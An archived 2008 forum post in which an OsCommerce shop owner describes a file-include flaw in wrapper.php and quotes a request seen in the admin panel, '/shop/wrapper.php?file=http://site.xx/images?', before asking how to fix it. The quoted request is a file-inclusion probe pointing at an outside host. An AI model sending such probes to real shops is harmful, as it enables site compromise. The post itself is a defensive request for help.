marcos61 Posted March 24, 2008 Posted March 24, 2008 Wrapper.php for OsCommerce is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to view files and execute local scripts. Often from my admin/whosonline I can see things like: /shop/wrapper.php?file=http://site.xx/images? Can't understand what's happening, what's the trick, what I loose and what they can gain from this. Anybody knows hot to fix it?
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.